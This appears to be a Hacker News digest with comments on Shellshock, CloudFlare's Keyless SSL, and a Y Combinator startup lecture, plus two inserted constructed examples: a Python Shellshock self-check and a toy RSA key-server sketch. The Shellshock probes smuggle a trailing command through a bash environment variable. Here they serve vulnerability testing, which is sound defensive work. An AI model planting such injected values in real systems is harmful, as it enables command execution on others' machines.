  ~ echo $SHELL
  ~ env x='() { do_something;}; echo vulnerable' bash -c "echo this is a test"
  this is a test
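Added example (not any commenter's script): a Python self-check that runs the two probe commands quoted in this thread, the `echo vulnerable` test WestCoastJustin and limsdims show and the CVE-2014-7169 `(a)=>\` file-creation test, against a bash binary and reports each outcome separately, since the thread shows the first fix closing one and not the other. It assumes a `bash` on PATH (or one passed in) and reports None for both checks when there is none; the trailing-command check compares output lines exactly as they appear in WestCoastJustin's before/after transcript.

```python
import os
import shutil
import subprocess
import tempfile

# The two probe values exactly as they appear in the thread.
PROBE_6271 = "() { :;}; echo vulnerable"  # original CVE-2014-6271 test
PROBE_7169 = "() { (a)=>\\"               # CVE-2014-7169 follow-on: dangling redirect


def classify_6271(stdout):
    """True when the trailing command after the function body was executed."""
    return "vulnerable" in stdout.splitlines()


def classify_7169(workdir):
    """True when the dangling redirect turned 'echo date' into 'date > echo'."""
    return os.path.exists(os.path.join(workdir, "echo"))


def check_shellshock(bash=None):
    """Run both probes against one bash binary; None means bash was not found."""
    bash = bash or shutil.which("bash")
    result = {"bash": bash, "cve_2014_6271": None, "cve_2014_7169": None}
    if bash is None:
        return result

    # Minimal environment, like `env -i` in the thread, plus PATH for the child.
    base_env = {"PATH": os.environ.get("PATH", "/usr/bin:/bin")}

    proc = subprocess.run(
        [bash, "-c", "echo test"],
        env={**base_env, "x": PROBE_6271},
        capture_output=True, text=True, timeout=10,
    )
    result["cve_2014_6271"] = classify_6271(proc.stdout)

    # Run in a scratch directory so a vulnerable bash creates its 'echo' file there.
    with tempfile.TemporaryDirectory() as workdir:
        subprocess.run(
            [bash, "-c", "echo date"],
            env={**base_env, "X": PROBE_7169},
            cwd=workdir, capture_output=True, text=True, timeout=10,
        )
        result["cve_2014_7169"] = classify_7169(workdir)
    return result


if __name__ == "__main__":
    for name, value in check_shellshock().items():
        print(f"{name}: {value}")
```

Pass a different path (for example the Homebrew bash from schrodingersCat's question next to the system one) to compare binaries on the same host; the probe string is placed in the child's environment directly, so the shell you launch the script from does not matter.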

martin_ 20 hours ago 2 replies      
An accepted patch has been released in the form of 4.3-9.1 [1]. It's available on debian everywhere except oldstable.

[1] http://osdir.com/ml/general/2014-09/msg47743.html

segmondy 20 hours ago 2 replies      
I'm very annoyed by the founder of this exploit, if you are going to release something as serious as this. At least work on a solution first. Bash source code is open and out there, isn't this supposed to be the "benefits" of open source? Gee.
Announcing Keyless SSL
507 points by jgrahamc  7 days ago   184 comments top 27
lucb1e 7 days ago 3 replies      
For those who want to understand how it works (it took me a minute, so I'll try to explain it simpler):

In simplified terms, the server usually stores a public and private key, and sends the public key to the client. The client generates a random password, encrypts it with the server's public key, and sends it to the server. Only anyone with the private key can decrypt the message, and that should only be the server.

Now you don't want to hand over this private key to Cloudflare if you don't need to, because then they can read all traffic. Up until now, you needed to.

What they did was take the private key and move it to a keyserver, owned by your bank or whomever. Every time the Cloudflare server receives a random password (which is encrypted with the public key) it just asks the keyserver "what does this encrypted message say?" After that it has the password to the connection and can read what the client (the browser) is sending, and write data back over the same encrypted connection. Without ever knowing what the private key was.

The connection from Cloudflare to your bank's webserver and keyserver can be encrypted in whatever way. It could be a fixed key for AES, it could be another long-lasting TLS connection (the overhead is mostly in the connection setup)... this isn't the interesting part and can be solved in a hundred fine ways.

Edit: Removed my opinion from this post. Any downvotes for my opinion would also push the explanation down (which I hope is useful to some). I mostly agree with the other comments anyway.

indutny 7 days ago 2 replies      
And my patch for OpenSSL that does the same thing: https://gist.github.com/indutny/1bda1561254f2d133b18 , ping me on email if you want to find out how to use it in your setup.
delinka 7 days ago 5 replies      
Instead of keeping the key in a potentially vulnerable place, they're putting it in an oracle: pass ciphertext to the oracle, get plaintext back. I'm interested in the authentication between CloudFlare and the oracle. Cryptographic examples involving an oracle tend to refer to the oracle as a black box that just blindly accepts data, transforms it, and replies. Of course, then the oracle's content (a key, an algorithm) risks exposure through deduction if an attacker can submit limitless requests. See http://en.wikipedia.org/wiki/Chosen-plaintext_attack

I'm not at all suggesting that CF hasn't thought of this; rather I want to see their mitigation of the risk.

mhandley 7 days ago 3 replies      
This seems to only slightly reduce the threat to the banks.

Currently, if someone compromises the Cloudflare servers, they gain the bank's private key and can impersonate the bank until the bank revokes their keys.

With this solution, if someone compromises the Cloudflare servers, they can impersonate the bank by relaying the decryption of the premaster secret through Cloudflare's compromised servers back to the bank. They can do this until Cloudflare notices and closes the security hole.

It's not clear that the difference is all that great in reality, as most of the damage will be done in the first 24 hours of either compromise.

personZ 7 days ago 4 replies      
After reading the beginning of the piece, I was expected something more...profound. Some deep mathematical breakthrough or something.

Instead they separate the actual key signing, delegating it to the customer's device. That's nice and useful, but isn't quite what I was expecting.

teddyh 7 days ago 4 replies      
So the communication between Cloudflare and the actual SSL key holder is secured by what? Another key? In that case, any compromise of Cloudflare's key is the same as a compromise of the original SSL key (at least in the short term).
otterley 7 days ago 4 replies      
Keyless SSL is basically an analogue of ssh-agent(1) for OpenSSL. It's a nice feature that you no longer have to trust CloudFlare with your private key, but there's a huge tradeoff: if your keyserver is unavailable (ironically, due to any of the things CloudFlare is supposed to protect you from or buffer you against -- DDoS, network/server issues, etc.), they can no longer authenticate requests served on your behalf and properly serve traffic.
windexh8er 7 days ago 2 replies      
All other technicalities aside it's rather interesting. From an HSM perspective it either makes that hardware now very useful or very useless.

Think of a large organization - you've been there (or not), there are 30 internal applications with self-signed certificates. Fail. The organization had purchased an HSM, but never really got it deployed because - well, that was too complex and it didn't integrate well with 3rd party network hardware and failed miserably in your *nix web stack.

This could be interesting - and I'm not commenting with regard to the efficacy or security concerns around this, but mainly the workflow simplicity it provides to large organizations who end up in self-signed-cert-hell because HSMs don't interoperate easily in a lot of use cases.

But to my original statement - this is a very good thing or a very bad thing for Thales and the like. The only requirement for an actually certified HSM, really, is certification against some hardware and software standard you have a checkbox to fulfill. Beyond that this would be a killer in the middleground for those who want an HSM like functionality but don't have any requirements to meet other than housing a secure segment where key management can be done in a more controlled manner.

vader1 7 days ago 1 reply      
While this is a cool feature, I wouldn't say the improvement is more than marginal: all potentially sensitive customer data is still available to Cloudflare in plain text. And after all, with a Business plan you can already use your own ("custom") SSL certificate which you can then revoke at any time.

Why not offer a "pass through" mode where the proxying is done on the network layer rather than the application layer? Of course in such a modus all CDN-like functionality could no longer be offered, but it could still do a fair amount of DDOS protection, no?

mback2k 7 days ago 0 replies      
So, this is not actually keyless SSL but SSL using something like a Hardware Security Module over networked PKCS#11. Did I miss something?
zaroth 7 days ago 1 reply      
See: Secure session capability using public-key cryptography without access to the private key.


praseodym 7 days ago 4 replies      
So CloudFlare won't get your private key, but will still get to see unencrypted plaintext for all traffic? Sounds like a huge improvement...
xorcist 7 days ago 1 reply      
The article is somewhat light on content. There are standard protocols for HSM use. What is the reason you didn't use these? There are clear risks involved with inventing your own security related protocols.
_pmf_ 7 days ago 0 replies      
Are we reinventing Kerberos again?
blibble 7 days ago 3 replies      
isn't this completely missing the point, i.e. banks being able to say 'no third parties can see our clients identifying information/balances/etc?'

yes, the SSL key doesn't leave the bank, but everything it is protecting is..

bjornsing 7 days ago 0 replies      
> World-renowned security experts Jon Callas and Phil Zimmermann support CloudFlare's latest announcement sharing, One of the core principles of computer security is to limit access to cryptographic keys to as few parties as possible, ideally only the endpoints. Application such as PGP, Silent Circle, and now Keyless SSL implement this principle and are correspondingly more secure.

Ehh... I'd say Keyless SSL implements the opposite of that principle: encryption terminates with CloudFlare but authentication terminates in some bank.

yk 7 days ago 0 replies      
So the problem is, how to get a cloud in the middle while keeping the green lock in the browser? Just yesterday I read Douglas Adam's phrase "technologies biggest success over itself."
kcbanner 7 days ago 1 reply      
Interesting, but what about the latency issues of having to always contact the key server?
sarciszewski 7 days ago 0 replies      
That is amazing. I can't wait to play with this code :D
yusyusyus 7 days ago 1 reply      
How does this architecture address PFS? I'm guessing a future version would require the exchange of DH private key to make it work...
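Added example, a constructed Python sketch rather than CloudFlare's protocol or code: it models the split lucb1e describes (the edge holds only the certificate's public key and asks a key server to do each private-key operation), the authenticated edge-to-key-server channel delinka and teddyh ask about, and the forward-secret variant yusyusyus raises, where the key server signs the edge's ephemeral value instead of decrypting anything. Textbook RSA over two Mersenne primes, an HMAC pre-shared secret and a SHA-256 stand-in for the TLS PRF are all assumptions chosen so it runs on the standard library; they illustrate the data flow, not a usable cipher.

```python
import hashlib
import hmac
import secrets

# Constructed toy RSA key pair: 2^521 - 1 and 2^607 - 1 are Mersenne primes.
P = (1 << 521) - 1
Q = (1 << 607) - 1
N = P * Q
E = 65537
D = pow(E, -1, (P - 1) * (Q - 1))  # private exponent; only the key server holds it
N_BYTES = (N.bit_length() + 7) // 8

# Assumed: the edge authenticates each request with an HMAC under a pre-shared
# secret. A real deployment would use a mutually authenticated channel.
EDGE_KEYSERVER_SECRET = secrets.token_bytes(32)


def _tag(secret, op, payload):
    return hmac.new(secret, op + payload, hashlib.sha256).digest()


class KeyServer:
    """Owned by the site operator: holds d and answers exactly two request types."""

    def __init__(self, d, n, secret):
        self._d, self._n, self._secret = d, n, secret
        self.audit = []  # every private-key operation is recorded here

    def _authorise(self, op, payload, tag):
        if not hmac.compare_digest(_tag(self._secret, op, payload), tag):
            raise PermissionError("unauthenticated key-server request")
        self.audit.append(op.decode())

    def decrypt(self, ciphertext, tag):
        """RSA key exchange: return the premaster secret, never d itself."""
        self._authorise(b"decrypt", ciphertext, tag)
        m = pow(int.from_bytes(ciphertext, "big"), self._d, self._n)
        return m.to_bytes(48, "big")

    def sign(self, digest, tag):
        """(EC)DHE key exchange: sign the edge's ephemeral public value."""
        self._authorise(b"sign", digest, tag)
        s = pow(int.from_bytes(digest, "big"), self._d, self._n)
        return s.to_bytes(N_BYTES, "big")


class Edge:
    """The proxy side: has the certificate (n, e) and a channel to the key server."""

    def __init__(self, n, e, keyserver, secret):
        self.n, self.e, self.keyserver, self._secret = n, e, keyserver, secret

    def finish_rsa_handshake(self, encrypted_premaster):
        tag = _tag(self._secret, b"decrypt", encrypted_premaster)
        return derive_session_key(self.keyserver.decrypt(encrypted_premaster, tag))

    def sign_ephemeral(self, ephemeral_public):
        digest = hashlib.sha256(ephemeral_public).digest()
        return self.keyserver.sign(digest, _tag(self._secret, b"sign", digest))


def derive_session_key(premaster):
    """Stand-in for the TLS PRF: both ends derive the same key from the premaster."""
    return hashlib.sha256(b"session-key|" + premaster).digest()


def client_rsa_key_exchange(n, e):
    """Browser side: pick a 48-byte premaster and encrypt it to the certificate key."""
    premaster = secrets.token_bytes(48)
    c = pow(int.from_bytes(premaster, "big"), e, n)
    return premaster, c.to_bytes(N_BYTES, "big")


def client_verify_signature(n, e, ephemeral_public, signature):
    expected = int.from_bytes(hashlib.sha256(ephemeral_public).digest(), "big")
    return pow(int.from_bytes(signature, "big"), e, n) == expected


def run_demo():
    ks = KeyServer(D, N, EDGE_KEYSERVER_SECRET)
    edge = Edge(N, E, ks, EDGE_KEYSERVER_SECRET)

    # 1. RSA key exchange: the key server decrypts once, the edge gets the session key.
    premaster, encrypted = client_rsa_key_exchange(N, E)
    edge_key = edge.finish_rsa_handshake(encrypted)

    # 2. Forward-secret exchange: the key server only signs; the ephemeral secret
    #    stays on the edge and the long-term key never protects session data.
    ephemeral_public = secrets.token_bytes(32)  # constructed stand-in for an ECDHE share
    sig = edge.sign_ephemeral(ephemeral_public)

    # 3. A request without a valid tag is refused and leaves no audit entry.
    try:
        ks.decrypt(encrypted, b"\x00" * 32)
        rejected = False
    except PermissionError:
        rejected = True

    return {
        "session_keys_match": edge_key == derive_session_key(premaster),
        "signature_valid": client_verify_signature(N, E, ephemeral_public, sig),
        "unauthenticated_rejected": rejected,
        "audit": list(ks.audit),
    }
```

The audit list is the operator-side view that mhandley's relay scenario leaves behind: an attacker on the edge can still ask for one decryption or signature per handshake, but only while the key server keeps answering, and every such request is visible and countable there, which is where rate limits and revocation of the edge's credential would attach.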
ambrop7 7 days ago 1 reply      
I don't like to sound hateful, but this is an obvious solution that any competent person knowing how TLS works would find. If someone tried to patent it, I suppose every smart card would be considered prior art. The only "novelty" is that the connection to the "smart card" is the network.

Not to say that it's not useful, but the article describes it as some grand invention.

general_failure 7 days ago 0 replies      
Well, Cloudflare can still read all the traffic. I thought that problem had been solved somehow.
diafygi 7 days ago 1 reply      
Is this the free SSL announcement that CloudFlare said it was going to announce in October?
liricooli 6 days ago 0 replies      
It seems that the correct title should have been "all your keys are belong to us".
EGreg 7 days ago 0 replies      
Wow, what a great read!
ilaksh 7 days ago 1 reply      
This is a discussion about cyberwarfare in a literal sense. The technical discussion shouldn't really be separated from the economic, political, social and human health concerns because all of those parts of the system interact deeply and directly.

A goal of total political cooperation or submission leads to economic sanctions leading to serious human health effects leading to defensive denial of service attacks. This accelerates the need to decentralize the financial network systems to make them more robust.

How can we imagine though that even after a complete transition to next generation systems that are ground-up distributed designs (not just stop-gap tweaks like this) that we won't have new types of attacks to deal with.

The starting point is the belief system that provides such fertile ground for conflict. We have to promote the idea that human lives have value and that lethal force is not an acceptable way to resolve conflict.

As long as decision makers are living in a sort of 1960s James Bond fantasy world we will all be subject to the insecurity of that type of world. Its largely built upon a type of primitive Social Darwinism that is still much more prevalent than most will acknowledge.

Its much easier to accept a compartmentalization of these problems and focus on a narrow technical aspect, but that does not integrate nearly enough information.

zameericle 7 days ago 1 reply      
Sounds like Elliptic Curve Diffie-Hellman is used between client/server to establish a private key. Not sure how this is new.
Lecture 1 How to Start a Startup [video]
504 points by declan  2 days ago   183 comments top 45
philipDS 2 days ago 8 replies      
I made some notes while watching/listening. Might include minor errors or misinterpretation on my side

4 critical parts: Idea, Team, Product, Execution

1. Idea

-> Good startups take about 10 years

-> Startup should feel like an important mission

-> Hardest part coming up with great ideas: best look terrible at the beginning (e.g. search engine, social networks limited to college students without money, a way to stay at stranger's couches)

-> "Today only a small subset of users want to use my product, but I'm going to get all of them"

-> You need to believe and willing to ignore naysayers

-> Most people will think your idea is bad: be happy. they won't compete. it's not dangerous to tell people your idea.

-> it's okay if it doesn't sound big at first. first version should take over a small specific market and expand from there. unpopular but right

-> take the time to think about how the market will evolve. market size in ~10 years. think about growth rate of the market instead of its current size. small, but rapidly growing market! people are desperate for a solution

-> you cannot create a market that does not exist

-> there are many great ideas, pick and find one you really care about.. "SW is eating the world"

-> "Why Now?" - dixit Sequoia - have a great answer to this question

-> Build something that you yourself need. You'll understand it a lot better.

-> Get close to your customers. Work in their office or talk to them multiple times a day

-> If it takes more than a sentence to you know what you're doing, it likely is too complicated

-> "Do more when you're a student." Think about new ideas and meet potential co-founders

-> Think about the market first and you'll have a big leg up

2. Product

-> Great Idea > Great Product > Great Company

-> Until you build a great product, almost nothing else matters

-> Sit in front of the computer working on product, or talk to your customers

-> Biz Dev, Raising Money, Raising Press, Hiring are significantly easier when you have a great product

-> Step 1: build something that users love

-> YC is all about: Exercise, Eat, Sleep, Work on Product and Talk to Customers

-> "It's better to build something that a small number of users love, than a large number of users like"

-> Get growth by word of mouth. This works for consumer as well as enterprise products. You'll see organic growth. If you don't have some early organic growth, then your product isn't good enough. It's the secret sauce to growth hacking.

-> Breakout companies always have a product that's so good that grows on word of mouth

-> Great products win. Make something users love.

-> Keep it simple. Look at first versions of Google, Facebook, iPhone

-> Founders care about small details. They're fanatical

-> One thing that correlates with success is hooking up PagerDuty to their ticketing system. Response time within an hour.

-> Go recruit your first users by hand to get feedback every day.

-> When everyone thought Pinterest was a joke, Ben Silbermann walked around coffee shops in Palo Alto to convince people to use Pinterest. He set Pinterest to the home page in the Palo Alto public library so people would discover the website. Do things that don't scale. Read Paul Graham's essay.

-> Create a tight feedback loop. What do users like? What do they pay for? What would make them recommend it?

-> Try to keep your feedback loop going for all of your companies' life

-> Do sales and customer support yourself in the early days. This is critical. Do not hire these people right away.

-> Keep track of metrics. Look at active users, activity levels, cohort retention, revenue, etc. Be brutally honest if they don't go in the right direction

-> If you don't get your product right, nothing else in this class will matter.

Why start a startup?

-> "It's glamorous", "You'll be the boss", "Flexibility", ...

-> Entrepreneurship gets romanticized

-> The reality is not so glamorous. It is a lot of hard work. You're sitting at your desk, focused, figuring out hard engineering projects. It is quite stressful.

-> Founder depression is a real thing. If you start a company, it's gonna be extremely hard

-> You have loads of responsibility

-> You're responsible for the opportunity cost of the people who decide to follow and help you out

-> You're more committed. A founder cannot leave a company. For 10 years if it's going well. Probably for 5 years if it's not going well.

-> "Number one role of a CEO is managing your own psychology"

-> You're always on call, you're a role model. You'll always be working anyway

-> If you joined Dropbox or Facebook early on, your financial reward might be a lot better than when starting a startup

-> If you join a later stage startup, you have more impact - massive userbase, existing infrastructure, work with an established team. E.g. Brett Taylor was employee #1500 at Google and he invented Google Maps. He got a big financial reward for this.

-> What's the best reason? You can't NOT do it. You have to make it happen

-> Do it out of passion

-> The world needs it (if not, go do something else) and/or the world needs you (you're well-suited to do it). The world needs you somewhere, find where.

tucaz 2 days ago 11 replies      
I've been watching it for 8 minutes as of now and despite the fact that the content looks good it really bores me to death that he is reading the whole thing like a robot. It does not sound like a natural conversation or presentation. Does anyone else share this feeling?
mbesto 2 days ago 3 replies      
Dustin talks about Financial Reward and Impact of "why to do a startup" for examples like Facebook and Dropbox here: https://www.youtube.com/watch?v=CBYhVcO4WgI#t=2161

Are these values correct? If you join Dropbox as employee #100 with 10bp, your 10bp is going to get massively diluted through subsequent rounds, no? Isn't it more like $1-2mil? And also this is wealth on paper, which means that you don't all of the sudden have $10mil sitting in the bank. I don't think he explains that but that's how it's portrayed, and is probably worth explaining, given the audience.

cjmb 2 days ago 2 replies      
On Sam's part -- am I the only one who got the "heard this before" feeling? Obviously he attributed everything pretty appropriately, but I thought I could've placed 50-75% of his sentences in the "Summary" sections of various PG essays, Peter Thiel writings, and other luminaries of the startup-sphere.

I'm not saying it was wrong or that his delivery was bad. But I remember reading the Class Notes from Thiel's class after Blake made them available and thinking "Wow, there's some original thoughts in here I haven't come across before."

Maybe it's because PG already put it all to paper, and some of these other figures just added post scripts. Maybe it was a solved problem by the time Sam got a seat at the table. Just some food for thought. Looking forward to the other lectures regardless.

dheer01 1 day ago 1 reply      
Disagree completely with the very first opinion expressed - 'Don't do a startup just to do one - do it only if you really want to solve a problem'.

India has produced about 3 big ~billion dollar companies in the recent past - inmobi, flipkart, druvaa. None of the founders really started to 'solve' a problem they were passionate about. What they were really passionate about was just 'starting up' - and based on their personal strengths, industry knowledge and what they thought could be sold, stumbled on these big businesses. This was probably true for HP too.

It is absolutely ok to do a startup just for the heck of it. Get in the game and find out the intersection of what you can build and what a customer will buy. If you build a big business - the passion will follow. Do not forget to bullshit though on your big interview on how the so solved problem kept you awake at nights - it makes for some good reading and impressionable pr.

bcjordan 1 day ago 0 replies      
To temper some of the nit picks, just wanted to say this lecture felt insightful and fun to watch. I hope YC continues this trend of investing effort in shareable advice content in the spirit of pg's essays.

This is the first time a lot of the YC flavor of startup how-to material has been presented in a lecture video format[1]. I suspect much of the long-term audience of these lectures wouldn't have come across pg's essays, Blake Masters' Peter Thiel startup notes or Dustin Moskovitz's excellent Medium posts before. Maybe some lecture watchers were allergic to long-form articles, or maybe some would rather receive a weekly email with videos. Myself, I consume this sort of material on my walk to work, either text-to-speeching essays or listening to lectures. The video lecture format was especially fun, I watched it full screen on the TV while eating an enchilada and poking my fiancee about points she might find relevant to her side project. How often do you get to consume this sort of content like that?

Having read pg's essays[2], I still had a number of "aha!" moments from Sam's slides and hearing his presentation. And hearing Dustin describe in his low-key tone why you should be employee 1,000 at an obviously successful startup rather than start your own, and backing it up with charts and photo-jokes about the elephant in the room was just entertaining. Seeing "this is how we'll teach you to do this thing. Here's an expert on why not to do this thing." is not always the type of juxtaposition you get with standalone online essays.

Looking forward to the next lecture. I'd say it's well worth the time and opportunity cost of putting this all together, so thanks all involved.

[1]: Yes, some Lean Startup and Principles of Entrepreneurship flavored material has been presented in lecture format before, but not YC lensed AFAIK.

[2]: Okay, I skipped the early seemingly pure-Lisp-focused ones. Though like Zen and the Art of Motorcycle Maintenance isn't about a long motorcycle trip, and maybe pg's Lisp essays are not really all about writing Lisp?

kartikkumar 1 day ago 1 reply      
One thing that bothered me about the lecture was reinforcement of the idea that working hard is the same as working long. I can appreciate the fact that at times as a founder you have to work all hours of the day, but surely this is not the optimum scenario for maximum productivity. If I look at my own work situation currently, it's abundantly apparent to me that the law of diminishing returns affects me strongly after working 8-10 hrs straight.

I would have expected the message to be that the most successful founders in the long-term are the ones that figure out the right work/life balance, to ensure they don't burn out. In other words, successful founders are able to be focussed and driven for the hours that they work, and in recharge-mode when offline.

This is intuitively what I would have expected and I'm curious if the message from the lecture of "work all day, everyday" is really right.

yatoomy 9 hours ago 0 replies      
I'm interested in Thiel's upcoming lecture. It seems like there has been a hard shift from "move fast/lean/mvp/pivot" to "make a monopoly". Economically speaking, it is accurate. Hopefully it will motivate people to go after problems previously taboo, ie healthcare, education, finance etc, and less about messaging and photo apps. Our world may depend on it.
smuss77 2 days ago 10 replies      
@3:12: "There are much easier ways of getting rich." Could I get some examples? Thank you!
agentultra 1 day ago 0 replies      
Great presentation and very clear that the rest of the course will be focusing on advice for SV-style hyper-growth startups.

There's still some good advice for those of us not interested in that life style. I was particularly taken with the idea of building something that just a handful of people will really love. Having a rapt-audience for your product would be a huge win if you decide to build more, scale up, or sell out.

I think it's really good that they're at least trying to convey how difficult building the style of companies they're talking about can be. I can appreciate how challenging that must be. The cultural yard-stick for success these days are valuations and IPOs. There's a ton of pressure to go that route especially from YC. I'm glad they're being conscientious about it even if they don't 100% succeed at removing some of the glimmer from the stars in peoples' eyes.

There's nothing wrong with wanting to start a smaller enterprise and aspire to keep just a handful of customers you know by name.

Reltair 1 day ago 1 reply      
The recommended reading from the final slide:

- The Hard Thing About Hard Things

- Zero to One (CS 138A)

- The Facebook Effect

- The 15 Commitments of Conscious Leadership

- The Tao of Leadership

- Nonviolent Communication

jduhamel 2 days ago 0 replies      
The presentation style is a bit rough but the material is gold.
bayesianhorse 1 day ago 1 reply      
There are easier ways to get rich? For Stanford Graduates, maybe. For those who don't have a degree in an ultra-paying job, I'd really like to know an easier way.

I'm usually sceptical about start-up chances, I know how much work it means, and I know that a lot of early-stage employees get rich, too. Yet, I don't think you can get rich this fast/easy with a modest degree... Even as early-stage employee often you'll still get a raw deal or you overestimate their chances of success.

jtwebman 1 day ago 0 replies      
Wow this was good information. It really got me thinking on what my reasons are and how bad they might be. Did anyone else get that from this?

I would also love if they cover how you work on a startup if you still have the 40 hours a week programming job as well. And how to avoid getting in trouble or legal issues with your job.

bramgg 2 days ago 2 replies      
@2:22: "You may still fail. The outcome is something like Idea x Product x Execution x Team x Luck, where Luck is a random number between 0 and 10,000, literally that much."

What does that mean? I'm not trying to rip on the video or anything like that, but am genuinely curious as to how much luck Sam Altman thinks is involved in a startup.

rdlecler1 1 day ago 2 replies      
Sam: "Step 1, build something that users love"

How does this compare with an MVP approach where you put something out there first and test the market. Then there is the issue of runway. With enough time, you can start with an MVP and iterate in private beta until users love it, but in many cases a founder is not going to have that kind of runway. They have just enough resources to put something together, and they're going to have to go out to the market with that and iterate on the fly. Unfortunately, once you do get out there and need to take on all of the other responsibilities, then that's time taken away from building a great product.

coralreef 1 day ago 1 reply      
Sam mentioned that the idea was actually quite important. I recall PG saying that YC would often invest in the team because ideas change and aren't as important as good founders.

Anyone have thoughts on this?

lukasm 2 days ago 2 replies      
I find it artificial when the lecturer reads the presentation - it's not a joy to listen.
steakejjs 2 days ago 0 replies      
This seems like a really valuable recruiting tool for YC. Start early at Stanford, groom freshman to have a great mindset and understanding of the fundamentals, fund them and make money.

YC is still a for-profit company, after all.

dkaplan 1 day ago 0 replies      
Why did we submit questions if the video was just going to cut out at the Q&A
petersouth 2 days ago 1 reply      
Sam Altman's law of conservation of how much happiness you can put into the world with the first product from a startup -> the total amount of love is the same it's just a question of how it's distributed.
piotry 1 day ago 0 replies      
Funny that I just wrote about how I was considering killing a startup I started: https://medium.com/@piotr/i-failed-82b9469977ac?source=lates...

Probably the best way to know how to build a successful one is knowing how to build one that won't fail!

hayksaakian 1 day ago 2 replies      
Sam kept bringing up the 10 year number

But: YC (and therefore every YC company) is < 8 years old

What startups succeeded after this long (AND were still actually considered startups)

simonebrunozzi 1 day ago 0 replies      
I also don't agree that working on a startup should mean no work-life balance. There's a limit to how productive you can be, and working 90 hours/week is not going to make you more productive than working 45 hours/week. If you work too much, you'll make more mistakes. Ryan Carson, founder of TeamTreeHouse, can teach us a lot about it. http://ryancarson.com/
AzmD 1 day ago 0 replies      
Ideas are important ... but if Ycombinator stresses so much on the idea being really great then they should take these lines off their website (it's on the "Apply" page)

"Your idea is important too, but mainly as evidence that you can have good ideas. Most successful startups change their idea substantially."

dkural 1 day ago 1 reply      
I disagree that a startup should commonly start with an "idea". Start with an unmet need people are willing to pay for. Or take an existing category with a lot of bad products and make a truly better one that improves every aspect of the experience. Often, you'll see many startups working on the same "idea". Something like Google is truly rare (a genuinely innovative approach to search).
bobbles 2 days ago 0 replies      
Are transcriptions of these videos going to be provided?

It's much easier for me to consume lectures as text rather than watching the video.

ckvamme 1 day ago 0 replies      
I posted some casual, but in depth notes on my site for anyone wanting to skip the video:


steve_taylor 1 day ago 0 replies      
It's refreshing to see such importance placed on the idea and building a product that users love.
howradical 1 day ago 0 replies      
Here are some timestamped notes synced with the video: https://timelined.com/how-to-start-a-startup/lecture-1-how-t...
lawsohard 1 day ago 0 replies      
looks like rap genius is putting up a full transcript http://tech.genius.com/Sam-altman-how-to-start-a-startup-lec...
ThomPete 2 days ago 6 replies      
Don't get me wrong I love Sam Altman I love y-combinator but a small part of me is thinking that a good first step to start a startup is to not watch that video and find your own way. Not because it's probably not great but because a startup is not a formula.

Your path is your own.

smaili 1 day ago 0 replies      
Can non-Stanford students drop in or is this for students only?
gadders 1 day ago 0 replies      
Just a quick question - are these a Sam only initiative, rather than YC? Is that why they are on Sam's domain?
gorkemyurt 2 days ago 1 reply      
It's really sad that he is reading the presentation..
7Figures2Commas 2 days ago 0 replies      
"All the advice in this class is geared towards people starting a business where the goal is hyper-growth and eventually building a very large company. Much of it doesn't apply in other cases and I want to warn people up front that if you try to do these things in a lot of big companies or non-startups it won't work."
xavierkelly 1 day ago 0 replies      
This is a really good video lesson. I feel inspired to work harder on my dreams of growing my startup.
polskibus 1 day ago 1 reply      
Is there a download link for the video to make offline viewing possible?
graycat 1 day ago 2 replies      
Just watched the lecture.

The first part of the lecture was on the "Idea", and I want to give an alternative approach.

First, do I believe that what Altman describes can work and is what he has seen has worked? Definitely yes.

Second, is that all that can work? I don't think so.

Third, do I suggest that the alternative approach I describe here will be common and/or always better than what Altman describes? No. Sometimes better? I do believe so. But even if the alternative approach is rare, that should not be a huge obstacle since the success Altman is talking about, the goal, is also rare. That is, for the rare successes, we should expect that some of the means will also be rare and not common.

But for the alternative approach, given that it is rare, we should have some solid evidence of its effectiveness, and I believe that we can.

I want to propose that it can be possible to have an idea, test it, essentially just on paper, and, if it passes the test, be quite sure the resulting product will be good and fairly sure the resulting company will be successful.

Yes, I'm proposing that the alternative approach provides a way to have the idea be by far the most important part of the work and the rest, e.g., the execution, be routine.

Or I would say that a good idea is one that makes it through the filters of my alternative approach. Then I am claiming that with a bad idea, yes, execution is everything but with a good idea execution is routine.

Yes, to me, the ideas like Altman describes look to me as far too unpromising to be taken seriously and promise that, yes, indeed, execution will be many times more difficult than the idea. Indeed, Altman is admitting that many start ups fail, that building a successful start up is difficult. I would agree that, starting with a bad idea, building a successful start up is difficult.

Now, for the alternative approach for finding a good idea for a start up:

First, the alternative approach is very selective, that is, rejects a lot of ideas. Some of the ideas the approach rejects will be able to be the basis of successful companies. The alternative approach rejects ideas when it just cannot build a rock solid case that the idea is good. E.g., the alternative does not know how to conclude that the ideas for Facebook or Twitter would lead to success. The alternative wants to accept only good ideas and in doing so will reject a lot of good ideas. The alternative approach asks for a lot from an idea, and many good ideas will not have that much.

Second, Altman does emphasize that a need and a corresponding solution one person sees in their own life can be relevant. Okay, I've been there and done that, that is, I've seen needs and solutions.

Third, what I'm proposing for an alternative is, at least in broad terms, and compared with what Altman describes, much older, much more thoroughly tested, and with a much better, really excellent, track record.

Actually, we all know at least something, maybe a lot, about the alternative and its track record. I learned about the alternative early in my career doing mostly US DoD projects around DC and also some other experiences, but there is much more information about the alternative readily available far from me.


(1) Need.

To make the alternative work, we have to start with a suitable need, i.e., market need, that is, a suitable problem to solve. We want the first good or a much better solution to be, obviously, no doubt, a "must have" and not just a "nice to have".

Next, for this need, we want to find the first good or a much better solution, presented just on paper.

Then we want to evaluate the solution, also just on paper. Sorry, no, we don't "get out of the building" and talk to other people.

Big example of such a need? Okay, we'd like to have a safe, effective, inexpensive one pill taken once to cure any cancer. So, yes, early on, for Facebook, Twitter, Snapchat, a lot of doubt. For such a cancer pill, we have "no doubt"; to know this we don't have to "get out of the building", ask people, throw trial solutions against a wall to see if there is interest, etc.

(2) Solution.

Given the need from (1), we try to find a solution. If we fail here, and likely we will, we return to (1) and find another need. E.g., clearly so far the one pill cure for any cancer will fail here for at least a long time.

We want a solution that we are sure, "no doubt", will be the first good or much better.

Here's a way: Start with the real problem and see what about it we can assume. Then convert this problem and its assumptions into a mathematical problem. So, we are limiting ourselves to needs that lead faithfully to mathematical problems. Sorry, no intuitive heuristics need apply.

Next find a mathematical solution.

Develop the mathematical solution just on paper, as carefully done theorems and proofs, and then severely check the proofs.

Then observe that it is totally clear that the mathematical solution will be fully close enough to the first good or much better solution we want for the need.

If any of the work here in step (2) fails, then return to step (1).

(3) Product.

Write software to do the data manipulations specified by the mathematical solution. Severely check the software. That's essentially the product.

If we fail here, then return to (1).

Track record? Okay:

(A) GPS.

